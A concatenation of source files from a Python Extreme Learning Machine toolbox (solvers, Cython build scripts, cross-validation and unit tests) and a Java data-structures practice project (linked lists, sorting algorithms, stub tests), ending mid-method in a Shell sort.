def try1():
    """Compare GPU and CPU solvers on random data and print their difference.

    Command-line arguments: n (problem size), nrhs (right-hand sides),
    k (number of batches).
    """
    n = int(sys.argv[1])
    nrhs = int(sys.argv[2])
    k = int(sys.argv[3])
    data = []
    for _ in range(k):
        # each batch has 70% of n rows, so the accumulated system only
        # becomes over-determined after a couple of batches
        n1 = int(n*0.7)
        X = np.random.rand(n1,n).astype(np.float64)
        T = np.random.rand(n1,nrhs).astype(np.float64)
        data.append((X,T))
    B = s_gpu(data, n, nrhs)
    Beta = s_cpu(data, n, nrhs)
    # norm of the difference between the two solutions
    print np.linalg.norm(B - Beta)
try1()
print "Works!"
<file_sep>from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(
cmdclass = {'build_ext': build_ext},
ext_modules = [Extension("rect",
sources = ["rect.pyx", "Rectangle.cpp"],
language="c++"
)]
)
<file_sep># -*- coding: utf-8 -*-
"""
Created on Sat Feb 21 20:46:31 2015
@author: akusok
"""
from gpu_solver import GPUSolver, gpu_solve
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Jan 6 19:05:03 2014
@author: akusoka1
"""
import numpy as np
from f_apply import f_apply
n = 100000
k = 2000
H = np.ones((n,k))
f = np.random.randint(0,2,size=(k,)).astype(np.int32)
f_apply(H,f)
print f
print H[0]<file_sep>#include <math.h>
void nl_func(double *H, const int *f, int n, int k);<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
def train_cv(self, X, T, k):
    """Choose the best number of neurons with k-fold cross-validation.

    The samples are split round-robin into k folds; in each round k-2 folds
    train the model, one fold validates and one fold tests.  A MYOPT-style
    interval-halving search over the neuron ranking finds the neuron count
    with the smallest penalized validation error; the network is then pruned
    to those neurons and retrained on the full data.

    :param X: matrix of inputs
    :param T: matrix of targets
    :param k: number of folds; must be at least 3 because two folds are
        reserved for validation and test in every round
    :return: test error averaged over folds (computed with the un-pruned model)
    """
    N = X.shape[0]
    # round-robin split of sample indices into k folds
    idxk = []
    for i in range(k):
        idxk.append(np.arange(N)[i::k])
    # pre-compute per-fold projections and neuron rankings
    datak = []
    for i in range(k):
        # rotate fold roles: first k-2 train, next validates, last one tests
        items = [(i+j) % k for j in range(k)]
        idx_tr = np.hstack([idxk[j] for j in items[:-2]])
        idx_vl = idxk[items[-2]]
        idx_ts = idxk[items[-1]]
        Xtr = X[idx_tr]
        Ttr = T[idx_tr]
        Xvl = X[idx_vl]
        Tvl = T[idx_vl]
        Xts = X[idx_ts]
        Tts = T[idx_ts]
        HH, HT = self._project(Xtr, Ttr)
        Hvl = self.project(Xvl)
        Hts = self.project(Xts)
        rank, nn = self._ranking(Hvl.shape[1], Hvl, Tvl)
        datak.append((HH, HT, Hvl, Tvl, Hts, Tts, rank))
    # NOTE(review): nn (and later rank) keep the values from the *last* fold;
    # this assumes every fold reports the same neuron count — confirm.
    e = np.ones((nn+1,)) * -1  # errors for all numbers of neurons; -1 = not computed yet
    err = 0
    for HH, HT, Hvl, Tvl, _, _, _ in datak:
        Beta = self._solve_corr(HH, HT)
        Yvl = np.dot(Hvl, Beta)
        err += self._error(Yvl, Tvl) / k
    penalty = err * 0.01 / nn  # penalty is 1% of error at max(nn)
    e[nn] = err + nn * penalty
    # MYOPT function
    # [A B C D E] interval points,
    # halve the interval each time
    # initialize intervals
    A = 3
    E = nn
    l = E - A
    # NOTE(review): integer division under Python 2 keeps B/C/D integral;
    # under Python 3 "/" would make them floats and break the e[...] indexing.
    B = A + l/4
    C = A + l/2
    D = A + 3*l/4
    l = 1000  # run the while loop at least once
    while l > 2:
        # calculate errors at points
        for idx in [A, B, C, D, E]:
            if e[idx] == -1:  # skip already calculated errors
                err = 0
                for HH, HT, Hvl, Tvl, _, _, rank in datak:
                    rank1 = rank[:idx]  # keep the idx best-ranked neurons
                    HH1 = HH[rank1, :][:, rank1]
                    HT1 = HT[rank1, :]
                    Beta = self._solve_corr(HH1, HT1)
                    Yvl = np.dot(Hvl[:, rank1], Beta)
                    err += self._error(Yvl, Tvl) / k
                e[idx] = err + idx * penalty
        m = min(e[A], e[B], e[C], e[D], e[E])  # find minimum element
        # halve the search interval around the current minimum
        if m in (e[A], e[B]):
            E = C
            C = B
        elif m in (e[D], e[E]):
            A = C
            C = D
        else:
            A = B
            E = D
        l = E - A
        B = A + l/4
        D = A + (3*l)/4
    k_opt = [n1 for n1 in [A, B, C, D, E] if e[n1] == m][0]  # find minimum index
    best_nn = rank[:k_opt]
    # get test error of the full (un-pruned) model, averaged over folds
    err_ts = 0
    for HH, HT, _, _, Hts, Tts, _ in datak:
        Beta = self._solve_corr(HH, HT)
        Yts = np.dot(Hts, Beta)
        err_ts += self._error(Yts, Tts) / k
    # prune to the selected neurons and retrain on all data
    self._prune(best_nn)
    self.Beta = self._project(X, T, solve=True)[2]
    # print "%d of %d neurons selected with a Cross-Validation" % (len(best_nn), nn)
    # print "the Cross-Validation test error is %f" % err_ts
    # if len(best_nn) > nn*0.9:
    #     print "Hint: try re-training with more hidden neurons"
    return err_ts
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 14:12:41 2014
@author: akusok
"""
from unittest import TestCase
import numpy as np
from hpelm import ELM
class TestCorrectness(TestCase):
    """Behavioral tests for the ELM class: input validation, neuron
    management and training edge cases.

    Fix: the deprecated TestCase aliases (assertEquals) are replaced with
    their modern counterparts (assertEqual); assertions are unchanged.
    """

    def test_1_NonNumpyInputs_RaiseError(self):
        X = np.array([['1', '2'], ['3', '4'], ['5', '6']])
        T = np.array([[1], [2], [3]])
        elm = ELM(2, 1)
        elm.add_neurons(1, "lin")
        self.assertRaises(AssertionError, elm.train, X, T)

    def test_2_NonNumpyTargets_RaiseError(self):
        X = np.array([[1, 2], [3, 4], [5, 6]])
        T = np.array([['a'], ['b'], ['c']])
        elm = ELM(2, 1)
        elm.add_neurons(1, "lin")
        self.assertRaises(AssertionError, elm.train, X, T)

    def test_3_OneDimensionInputs_RunsCorrectly(self):
        X = np.array([1, 2, 3])
        T = np.array([[1], [2], [3]])
        elm = ELM(1, 1)
        elm.add_neurons(1, "lin")
        elm.train(X, T)

    def test_4_OneDimensionTargets_RunsCorrectly(self):
        X = np.array([1, 2, 3])
        T = np.array([1, 2, 3])
        elm = ELM(1, 1)
        elm.add_neurons(1, "lin")
        elm.train(X, T)

    def test_5_WrongDimensionalityInputs_RaiseError(self):
        X = np.array([[1, 2], [3, 4], [5, 6]])
        T = np.array([[1], [2], [3]])
        elm = ELM(1, 1)
        elm.add_neurons(1, "lin")
        self.assertRaises(AssertionError, elm.train, X, T)

    def test_6_WrongDimensionalityTargets_RaiseError(self):
        X = np.array([[1, 2], [3, 4], [5, 6]])
        T = np.array([[1], [2], [3]])
        elm = ELM(1, 2)
        elm.add_neurons(1, "lin")
        self.assertRaises(AssertionError, elm.train, X, T)

    def test_7_ZeroInputs_RunsCorrectly(self):
        X = np.array([[0, 0], [0, 0], [0, 0]])
        T = np.array([1, 2, 3])
        elm = ELM(2, 1)
        elm.add_neurons(1, "lin")
        elm.train(X, T)

    def test_8_OneDimensionTargets_RunsCorrectly(self):
        X = np.array([[1, 2], [3, 4], [5, 6]])
        T = np.array([[0], [0], [0]])
        elm = ELM(2, 1)
        elm.add_neurons(1, "lin")
        elm.train(X, T)

    def test_9_TrainWithoutNeurons_RaiseError(self):
        X = np.array([1, 2, 3])
        T = np.array([1, 2, 3])
        elm = ELM(1, 1)
        self.assertRaises(AssertionError, elm.train, X, T)

    def test_10_DifferentNumberOfSamples_RaiseError(self):
        X = np.array([[1, 2], [3, 4], [5, 6]])
        T = np.array([[1], [2]])
        elm = ELM(2, 1)
        self.assertRaises(AssertionError, elm.train, X, T)

    def test_11_LinearNeurons_MoreThanInputs_Truncated(self):
        elm = ELM(2, 1)
        elm.add_neurons(3, "lin")
        self.assertEqual(2, elm.neurons[0][1])

    def test_12_LinearNeurons_DefaultMatrix_Identity(self):
        elm = ELM(4, 1)
        elm.add_neurons(3, "lin")
        np.testing.assert_array_almost_equal(np.eye(4, 3), elm.neurons[0][2])

    def test_13_SLFN_AddLinearNeurons_GotThem(self):
        elm = ELM(1, 1)
        elm.add_neurons(1, "lin")
        self.assertEqual("lin", elm.neurons[0][0])

    def test_14_SLFN_AddSigmoidalNeurons_GotThem(self):
        elm = ELM(1, 1)
        elm.add_neurons(1, "sigm")
        self.assertEqual("sigm", elm.neurons[0][0])

    def test_15_SLFN_AddTanhNeurons_GotThem(self):
        elm = ELM(1, 1)
        elm.add_neurons(1, "tanh")
        self.assertEqual("tanh", elm.neurons[0][0])

    def test_16_SLFN_AddRbfL1Neurons_GotThem(self):
        elm = ELM(1, 1)
        elm.add_neurons(1, "rbf_l1")
        self.assertEqual("rbf_l1", elm.neurons[0][0])

    def test_17_SLFN_AddRbfL2Neurons_GotThem(self):
        elm = ELM(1, 1)
        elm.add_neurons(1, "rbf_l2")
        self.assertEqual("rbf_l2", elm.neurons[0][0])

    def test_18_SLFN_AddRbfLinfNeurons_GotThem(self):
        elm = ELM(1, 1)
        elm.add_neurons(1, "rbf_linf")
        self.assertEqual("rbf_linf", elm.neurons[0][0])

    def test_19_SLFN_AddUfuncNeurons_GotThem(self):
        elm = ELM(1, 1)
        func = np.frompyfunc(lambda a: a+1, 1, 1)
        elm.add_neurons(1, func)
        self.assertIs(func, elm.neurons[0][0])

    def test_20_SLFN_AddTwoNeuronTypes_GotThem(self):
        elm = ELM(1, 1)
        elm.add_neurons(1, "lin")
        elm.add_neurons(1, "sigm")
        self.assertEqual(2, len(elm.neurons))
        ntypes = [nr[0] for nr in elm.neurons]
        self.assertIn("lin", ntypes)
        self.assertIn("sigm", ntypes)

    def test_21_SLFN_AddNeuronsTwice_GotThem(self):
        elm = ELM(1, 1)
        elm.add_neurons(1, "lin")
        elm.add_neurons(1, "lin")
        self.assertEqual(1, len(elm.neurons))
        self.assertEqual(2, elm.neurons[0][1])

    def test_22_AddNeurons_InitBias_BiasInModel(self):
        elm = ELM(1, 1)
        bias = np.array([1, 2, 3])
        elm.add_neurons(3, "sigm", None, bias)
        np.testing.assert_array_almost_equal(bias, elm.neurons[0][3])

    def test_23_AddNeurons_InitW_WInModel(self):
        elm = ELM(2, 1)
        W = np.array([[1, 2, 3], [4, 5, 6]])
        elm.add_neurons(3, "sigm", W, None)
        np.testing.assert_array_almost_equal(W, elm.neurons[0][2])

    def test_24_AddNeurons_InitDefault_BiasWNotZero(self):
        elm = ELM(2, 1)
        elm.add_neurons(3, "sigm")
        W = elm.neurons[0][2]
        bias = elm.neurons[0][3]
        self.assertGreater(np.sum(np.abs(W)), 0.001)
        self.assertGreater(np.sum(np.abs(bias)), 0.001)

    def test_25_AddNeurons_InitTwiceBiasW_CorrectlyMerged(self):
        elm = ELM(2, 1)
        W1 = np.random.rand(2, 3)
        W2 = np.random.rand(2, 4)
        bias1 = np.random.rand(3,)
        bias2 = np.random.rand(4,)
        elm.add_neurons(3, "sigm", W1, bias1)
        elm.add_neurons(4, "sigm", W2, bias2)
        np.testing.assert_array_almost_equal(np.hstack((W1, W2)), elm.neurons[0][2])
        np.testing.assert_array_almost_equal(np.hstack((bias1, bias2)), elm.neurons[0][3])
<file_sep># -*- coding: utf-8 -*-
"""
Created on Thu Oct 30 20:50:54 2014
@author: akusok
"""
import numpy as np
import time
@profile
def line_count(filename):
start_time = time.time()
f = open(filename)
lines = 0
buf_size = 1024 * 1024
read_f = f.read # loop optimization
buf = read_f(buf_size)
while buf:
lines += buf.count('\n')
buf = read_f(buf_size)
print lines, time.time() - start_time
@profile
def run():
    """Check a batched (streaming) standard-deviation estimate against np.std.

    Accumulates E[x] and E[x^2] over batches of b rows, derives the standard
    deviation per column, and prints it next to numpy's direct computation.
    """
    #x =np.random.randn(100000000,5)
    x = np.random.randn(10000000,5)
    b = 3952  # batch size (rows per chunk)
    n = x.shape[0]
    E_x = 0
    E_x2 = 0
    for i in range(n/b + 1):
        # k = rows in this batch; the last batch may be shorter than b
        k = min(b, n-i*b)
        xb = x[i*b:i*b+k]
        # weight each batch mean by its share of the total row count
        E_x += np.mean(xb,0) * (1.0*k/n)
        E_x2 += np.mean(xb**2,0) * (1.0*k/n)
    E2_x = E_x**2
    # std = sqrt(E[x^2] - E[x]^2), computed per column
    sh = (E_x2 - E2_x)**0.5
    s = np.std(x,0)
    print sh
    print s
#run()
# Fix: this module defines line_count(), not bufcount() — the previous call
# to the undefined name raised NameError before doing any work.
line_count("/home/akusok/Documents/X-ELM/hpelm/datasets/regression_song_year/Xtr.txt")
<file_sep>#!/usr/bin/env python
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
import numpy
ext_module = Extension(
"f_apply",
["f_apply.pyx", "mp_func.c"],
include_dirs=[numpy.get_include()],
extra_compile_args=['-fopenmp'],
extra_link_args=['-fopenmp'],
)
setup(
name = 'f_apply',
cmdclass = {'build_ext': build_ext},
ext_modules = [ext_module],
)
<file_sep>High Performance ELM
--------
Extreme Learning Machine (ELM) with model selection and regularizations.
In-memory ELM works; see the hpelm/tests folder for examples.
MAGMA acceleration works; see hpelm/acc/setup_gpu.py for the build setup.
Example usage::
>>> from hpelm import ELM
>>> elm = ELM(X.shape[1], T.shape[1])
>>> elm.add_neurons(20, "sigm")
>>> elm.add_neurons(10, "rbf_l2")
>>> elm.train(X, T, "LOO")
>>> Y = elm.predict(X)
If you use the toolbox, cite our paper "High Performance Extreme Learning Machines: A Complete Toolbox for Big Data Applications" that will be published in IEEE Access.
<file_sep># -*- coding: utf-8 -*-
"""
Created on Sat Oct 18 17:21:12 2014
@author: akusok
"""
from setuptools import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
import commands
import numpy
import sys
def pkgconfig(*packages, **kw):
    """Collect compiler/linker settings for `packages` from pkg-config.

    Parses the output of ``pkg-config --libs --cflags <packages>`` into the
    keyword dict: -I/-L/-l flags become 'include_dirs', 'library_dirs' and
    'libraries' entries; every other token lands in 'extra_compile_args'.
    To test, run in terminal: "pkg-config --libs --cflags magma"
    To add "magma" to pkg-config:
        export PKG_CONFIG_PATH=$PKG_CONFIG_PATH:/usr/local/magma/lib/pkgconfig
    use your own path to installed magma + lib/pkgconfig
    """
    flag_map = {'-I': 'include_dirs', '-L': 'library_dirs', '-l': 'libraries'}
    output = commands.getoutput("pkg-config --libs --cflags %s" % ' '.join(packages))
    for token in output.split():
        prefix, value = token[:2], token[2:]
        if prefix in flag_map:
            kw.setdefault(flag_map[prefix], []).append(value)
        else:
            kw.setdefault('extra_compile_args', []).append(token)
    return kw
setup(cmdclass={'build_ext': build_ext},
ext_modules=[
Extension(
"gpu_solver",
sources=["gpu_solver.pyx",
"gpu_code.cpp"],
language="c++",
extra_compile_args=pkgconfig("magma")["extra_compile_args"],
include_dirs=[numpy.get_include()] + pkgconfig("magma")["include_dirs"],
libraries=pkgconfig("magma")["libraries"],
library_dirs=pkgconfig("magma")["library_dirs"])
]
)
| e8ef3a7042f54a0827a835bc06dc6fbe073753f3 | [
"reStructuredText",
"Python",
"C",
"C++",
"Shell"
] | 57 | Shell | YuanhaoGong/hpelm | 74a20302fe22588ab1b7b02cb761c5405cdff5f3 | 0abc3c5585461f3a688089a6589038f1a5bed2a1 |
refs/heads/master | <file_sep>package org.dongtech.datastructures;
import org.dongtech.datastructures.list.SortedLinkedList;
import org.dongtech.datastructures.list.SortedListInterface;
/**
* @author Fuqiang
* Created on 24/02/2018.
*/
public class SortedLinkedListTest extends BaseTest {
public static void main(String[] args) {
SortedListInterface<String> strings = new SortedLinkedList<>();
strings.add("Jamie");
strings.add("Brenda");
strings.add("Sarah");
strings.add("Tom");
strings.add("Carlos");
log(strings.toString());
}
}
<file_sep>package org.dongtech.datastructures;
import org.dongtech.datastructures.*;
import org.dongtech.datastructures.list.SortArray;
import java.util.Arrays;
/**
* @author Fuqiang
* Created on 22/02/2018.
*/
public class SortByComparatorTest {
public static void main(String[] args) {
int i = 5;
Student[] students = new Student[i];
for (int j = 0; j < i; j++) {
Student s = new Student("s" + j, (int) (Math.random() * 10), "00" + (int) (Math.random() * 100), Math.random
() * 100);
students[j] = s;
}
SortArray.sort(students, new NameComparator());
System.out.println(Arrays.toString(students));
SortArray.sort(students, new GradeComparator());
System.out.println(Arrays.toString(students));
SortArray.sort(students, new CodeComparator());
System.out.println(Arrays.toString(students));
SortArray.sort(students, new ScoreComparator());
System.out.println(Arrays.toString(students));
}
}
<file_sep>package org.dongtech.javacore.multithreads;
import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.*;
/**
* @author Fuqiang
* Created on 2018/5/12.
*/
class SearchTaskTest {
@Test
void search() {
}
@Test
void run() {
}
}<file_sep>package org.dongtech.datastructures.list;
import java.io.Serializable;
/**
* @author Fuqiang
* Created on 28/02/2018.
*/
/**
 * Base class for singly linked chains: holds the head reference and length,
 * and offers protected node-level helpers for concrete subclasses.
 *
 * Fixes: clear() now actually resets state, isEmpty() reflects the length,
 * getNodeAt()/display() are implemented, and the length counter is kept in
 * sync by addAfterNode/removeFirstNode/removeAfterNode.
 */
public abstract class LinkedChainBase<T> implements Serializable {
    private Node firstNode; // head of the chain, null when empty
    private int length;     // number of nodes currently in the chain

    public LinkedChainBase() {
        clear();
    }

    /** Removes every entry by resetting the head reference and the length. */
    public void clear() {
        firstNode = null;
        length = 0;
    }

    public int getLength() {
        return length;
    }

    /** @return true when the chain holds no nodes */
    public boolean isEmpty() {
        return length == 0;
    }

    /** A linked chain grows on demand, so it is never full. */
    public boolean isFull() {
        return false;
    }

    /** Prints the chain contents, one entry per line (debug helper). */
    public void display() {
        for (Node current = firstNode; current != null; current = current.getNext()) {
            System.out.println(current.getData());
        }
    }

    /**
     * @param position 1-based position in the chain
     * @return the node at {@code position}, or null when out of range
     */
    protected final Node getNodeAt(int position) {
        if (position < 1 || position > length) {
            return null;
        }
        Node current = firstNode;
        for (int i = 1; i < position; i++) {
            current = current.getNext();
        }
        return current;
    }

    /** Links {@code newNode} in front of the current head. */
    protected final void addFirstNode(Node newNode) {
        assert newNode != null : "null argument in addFirstNode";
        newNode.setNext(firstNode);
        firstNode = newNode;
        length++;
    }

    /** Links {@code newNode} directly after {@code nodeBefore}. */
    protected final void addAfterNode(Node nodeBefore, Node newNode) {
        newNode.setNext(nodeBefore.getNext());
        nodeBefore.setNext(newNode);
        length++; // fix: keep the counter in sync with insertions
    }

    /** Unlinks the head node and returns its payload. */
    protected final T removeFirstNode() {
        Node nodeToRemove = firstNode;
        firstNode = nodeToRemove.getNext();
        length--; // fix: keep the counter in sync with removals
        return nodeToRemove.getData();
    }

    /** Unlinks the node after {@code nodeBefore}; returns its payload or null. */
    protected final T removeAfterNode(Node nodeBefore) {
        Node currentNode = nodeBefore.getNext();
        if (null != currentNode) {
            nodeBefore.setNext(currentNode.getNext());
            length--; // fix: keep the counter in sync with removals
            return currentNode.getData();
        }
        return null;
    }

    protected final Node getFirstNode() {
        return firstNode;
    }

    /** A single chain node: payload plus a reference to the next node. */
    protected class Node implements Serializable {
        private T data;
        private Node next;

        protected Node(T data) {
            this.data = data;
        }

        private Node(T dataPortion, Node nextNode) {
            data = dataPortion;
            next = nextNode;
        }

        protected T getData() {
            return data;
        }

        private void setData(T data) {
            this.data = data;
        }

        protected Node getNext() {
            return next;
        }

        private void setNext(Node next) {
            this.next = next;
        }
    }
}
<file_sep>package org.dongtech.datastructures.list;
import java.io.Serializable;
/**
* @author Fuqiang
* Created on 27/02/2018.
*/
public class LListRevised<T> extends LinkedChainBase<T> implements ListInterface<T>, Serializable {
private Node firstNode;
private int length = 0;
public LListRevised() {
clear();
}
@Override
public boolean add(int position, T newEntry) {
return false;
}
@Override
public T remove(int position) {
T result = null;
if (position >= 1 && position <= getLength()) {
assert !isEmpty();
if (position == 1) {
result = removeFirstNode();
} else {
Node nodeBefore = getNodeAt(position - 1);
result = removeAfterNode(nodeBefore);
}
}
return result;
}
@Override
public T getEntry(int position) {
return null;
}
@Override
public void clear() {
firstNode = null;
length = 0;
}
@Override
public int getLength() {
return length;
}
@Override
public boolean isEmpty() {
return false;
}
}
<file_sep>package org.dongtech.datastructures;
import org.dongtech.datastructures.list.SortArray;
import java.util.Arrays;
/**
* @author Fuqiang
* Created on 13/02/2018.
*/
public class ShellSortTest {
public static void main(String... args) {
String[] arr = {"9", "6", "2", "4", "8"};
SortArray.shellSort(arr, arr.length);
System.out.print(Arrays.toString(arr));
}
}
<file_sep>package org.dongtech.javacore.generic;
/**
* @author Fuqiang
* Created on 30/01/2018.
*/
public class Singleton<T> {
public static <T> T getSingleInstance(T a) {
return a;
}
}
<file_sep>package org.dongtech.datastructures.graph;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
/**
* @author Fuqiang
* Created on 2018/5/10.
*/
class DirectedGraphTest {
private Graph graph ;
@BeforeEach
void setUp() {
this.graph = new DirectedGraph();
}
@Test
void addNode() {
}
@Test
void addEdge() {
}
}
<file_sep>package org.dongtech.datastructures;
/**
* @author Fuqiang
* Created on 01/02/2018.
*/
public class Widget implements Comparable<Widget>{
public int compareTo(Widget o) {
return 0;
}
}
<file_sep>package org.dongtech.datastructures;
import org.dongtech.datastructures.list.SortArray;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
/**
* @author Fuqiang
* Created on 22/02/2018.
*/
class SortArrayTest {
private String[] arr;
@BeforeEach
void setUp() {
this.arr = new String[]{"9", "6", "2", "4", "8"};
}
@Test
void sort() {
}
@Test
void quickSort() {
}
@Test
void mergeSort() {
}
@Test
void sort1() {
}
@Test
void shellSort() {
}
@Test
void shellSort1() {
}
@Test
void insertionSort() {
}
@Test
void selectionSort2() {
}
@Test
void selectionSort() {
}
@Test
void isSorted() {
}
@Test
void radixSort() {
}
@Test
void bubbleSort() {
SortArray.bubbleSort(this.arr, 5);
}
@Test
void bubbleSort1() {
SortArray.bubbleSort(this.arr, 0, 4);
}
}
<file_sep>package org.dongtech.datastructures;
import org.dongtech.datastructures.list.SortArray;
import java.util.Arrays;
/**
* @author Fuqiang
* Created on 24/02/2018.
*/
public class RadixSortTest extends BaseTest {
public static void main(String[] args) {
int length = 1000000;
int index = 0;
int[] a = new int[length];
while (index < length) {
a[index++] = (int) (Math.random() * 1000);
}
log("Radix Sort Start...");
long start = System.currentTimeMillis();
SortArray.radixSort(a, 0, length - 1, 3);
long end = System.currentTimeMillis();
log("Radix Sort End.");
// log("Result: " + (SortArray.isSorted(a) ? "Success" : "Fail"));
log("Result: " + Arrays.toString(a));
log("Duration: " + (end - start) + " ms");
}
}
<file_sep>package org.dongtech.javacore.multithreads;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.assertEquals;
/**
* @author Fuqiang
* Created on 2018/5/11.
*/
class MyBankTest {
private Bank bank;
@BeforeEach
void setUp() {
this.bank = new MyBank(10, 150);
}
@Test
void transfer() {
try {
this.bank.transfer(0, 1, 100);
} catch (InterruptedException e) {
e.printStackTrace();
}
assertEquals(50, this.bank.getBalance(0));
}
@Test
void getTotalBalance() {
this.bank.getTotalBalance();
}
@Test
void size() {
int size = this.bank.size();
assertEquals(10, size);
}
}
<file_sep>package org.dongtech.datastructures;
/**
* @author Fuqiang
* Created on 22/02/2018.
*/
/**
 * Simple data holder (POJO) for a student record: name, grade, code and
 * average score.  Provides a full-field constructor, {@code toString} and
 * bean-style getters/setters; used by the comparator sorting demos.
 */
public class Student {
    private String name;     // student's display name
    private Integer grade;   // grade/year number
    private String code;     // student code kept as text (may carry leading zeros)
    private Double avgScore; // average score

    /** Creates a fully initialized student record. */
    public Student(String name, Integer grade, String code, Double avgScore) {
        this.name = name;
        this.grade = grade;
        this.code = code;
        this.avgScore = avgScore;
    }

    /** Human-readable dump of all fields, used by the console demos. */
    @Override
    public String toString() {
        return "Student{" +
                "name='" + name + '\'' +
                ", grade=" + grade +
                ", code='" + code + '\'' +
                ", avgScore=" + avgScore +
                '}';
    }

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public Integer getGrade() {
        return grade;
    }

    public void setGrade(Integer grade) {
        this.grade = grade;
    }

    public String getCode() {
        return code;
    }

    public void setCode(String code) {
        this.code = code;
    }

    public Double getAvgScore() {
        return avgScore;
    }

    public void setAvgScore(Double avgScore) {
        this.avgScore = avgScore;
    }
}
<file_sep>package org.dongtech.datastructures.graph;
/**
* @author Fuqiang
* Created on 2018/5/10.
*/
// Stub implementation: declares conformance to Graph but stores no state and
// implements nothing yet (DirectedGraphTest's addNode/addEdge tests are empty too).
public class DirectedGraph implements Graph {
}
<file_sep>package org.dongtech.datastructures.list;
import org.dongtech.datastructures.Comparator;
/**
* @author Fuqiang
* Created on 29/01/2018.
*/
public class SortArray {
private static int MIN_SIZE = 4;
/**
* 定义一个泛型方法,该方法要求泛型的实例是一个实现了Comparable接口的类型
* Comparable<? super T> 表示,这个实例可以不直接实现Comparable接口,而是通过其父类实现Comparable接口
*
* @param a
* @param n
* @param <T>
*/
public static <T extends Comparable<? super T>> void sort(T[] a, int n) {
}
/**
* 快速排序递归实现
*
* @param a
* @param first
* @param last
* @param <T>
*/
public static <T extends Comparable<? super T>> void quickSort(T[] a, int first, int last) {
if (last - first + 1 < MIN_SIZE) {
insertionSort(a, first, last);
} else {
int pivotIndex = partition(a, first, last);
quickSort(a, first, pivotIndex - 1);
quickSort(a, pivotIndex, last);
}
}
/**
* 将数组划分为由支点分隔的两个子数组,左边数组的所有元素小于等于支点,右边数组的所有元素大于等于支点
*
* @param a
* @param first
* @param last
* @param <T>
* @return
*/
private static <T extends Comparable<? super T>> int partition(T[] a, int first, int last) {
int mid = (first + last) / 2;
sortFirstMiddleLast(a, first, mid, last);
swap(a, mid, last - 1);
int pivotIndex = last - 1;
T pivot = a[pivotIndex];
int indexFromLeft = first + 1;
int indexFromRight = last - 2;
boolean done = false;
while (!done) {
while (a[indexFromLeft].compareTo(pivot) < 0) {
indexFromLeft++;
}
while (a[indexFromRight].compareTo(pivot) > 0) {
indexFromRight--;
}
assert a[indexFromLeft].compareTo(pivot) >= 0 && a[indexFromRight].compareTo(pivot) <= 0;
if (indexFromLeft < indexFromRight) {
swap(a, indexFromLeft, indexFromRight);
indexFromLeft++;
indexFromRight--;
} else {
done = true;
}
}
swap(a, pivotIndex, indexFromLeft);
pivotIndex = indexFromLeft;
return pivotIndex;
}
/**
* 三点取中值支点选择法
*
* @param a
* @param first
* @param middle
* @param last
* @param <T>
*/
private static <T extends Comparable<? super T>> void sortFirstMiddleLast(T[] a, int first, int middle, int last) {
order(a, first, middle);
order(a, middle, last);
order(a, first, middle);
}
private static <T extends Comparable<? super T>> void order(T[] a, int i, int j) {
if (a[i].compareTo(a[j]) > 0) {
swap(a, i, j);
}
}
/**
* 归并排序递归实现,效率O(n logn)
*
* @param a
* @param first
* @param last
* @param <T>
*/
public static <T extends Comparable<? super T>> void mergeSort(T[] a, int first, int last) {
T[] tempArray = (T[]) new Comparable[a.length];
mergeSort(a, tempArray, first, last);
}
private static <T extends Comparable<? super T>> void mergeSort(T[] a, T[] tempArray, int first, int last) {
if (first < last) {
int mid = (first + last) / 2;
mergeSort(a, tempArray, first, mid);
mergeSort(a, tempArray, mid + 1, last);
merge(a, tempArray, first, mid, last);
}
}
private static <T extends Comparable<? super T>> void merge(T[] a, T[] tempArray, int first, int mid, int last) {
if (a[mid].compareTo(a[mid + 1]) <= 0) {
//如果左边有序数组的最大值小于等于右边有序数组的最小值,则不执行归并.
return;
}
int beginHalf1 = first;
int beginHalf2 = mid + 1;
int index = 0;
while (beginHalf1 <= mid && beginHalf2 <= last) {
if (a[beginHalf1].compareTo(a[beginHalf2]) < 0) {
tempArray[index++] = a[beginHalf1++];
} else {
tempArray[index++] = a[beginHalf2++];
}
}
while (beginHalf1 <= mid) {
tempArray[index++] = a[beginHalf1++];
}
while (beginHalf2 <= last) {
tempArray[index++] = a[beginHalf2++];
}
index = 0;
while (first <= last) {
a[first++] = tempArray[index++];
}
}
/**
* 一个可以自定定义比较器的冒泡排序法
*
* @param a
* @param comparator
* @param <T>
*/
public static <T> void sort(T[] a, Comparator<T> comparator) {
for (int i = a.length; i >= 0; i--) {
for (int j = 1; j < i; j++) {
if (comparator.compare(a[j - 1], a[j]) > 0) {
swap(a, j - 1, j);
}
}
}
}
private static void swap(Object[] a, int i, int j) {
if (i != j) {
Object tmp = a[i];
a[i] = a[j];
a[j] = tmp;
}
}
/**
* 冒泡排序
*
* @param a
* @param n
* @param <T>
*/
public static <T extends Comparable<? super T>> void bubbleSort(T[] a, int n) {
// for (int i = n; i >= 0; i--) {
// for (int j = 1; j < i; j++) {
// if (a[j - 1].compareTo(a[j]) > 0) {
// swap(a, j - 1, j);
// }
// }
// }
bubbleSort(a, 0, n - 1);
}
public static <T extends Comparable<? super T>> void bubbleSort(T[] a, int first, int last) {
if (first < last) {
int index = bubble(a, first, last);
bubbleSort(a, first, index);
}
}
/**
* @param a
* @param first
* @param last
* @param <T>
* @return 返回最后一次交换中,左边元素的索引
*/
private static <T extends Comparable<? super T>> int bubble(T[] a, int first, int last) {
int index = first;
for (int i = first; i < last; i++) {
if (a[i].compareTo(a[i + 1]) > 0) {
swap(a, i, i + 1);
index = i;
}
}
return index;
}
/**
* 希尔排序
* @param a
* @param n
* @param <T>
*/
public static <T extends Comparable<? super T>> void shellSort(T[] a, int n) {
shellSort(a, 0, n - 1);
}
public static <T extends Comparable<? super T>> void shellSort(T[] a, int first, int last) {
if (first < last) {
int n = last - first + 1;
for (int space = n / 2; space > 0; space = space / 2) {
int tmp = space % 2 == 0 ? space + 1 : space;
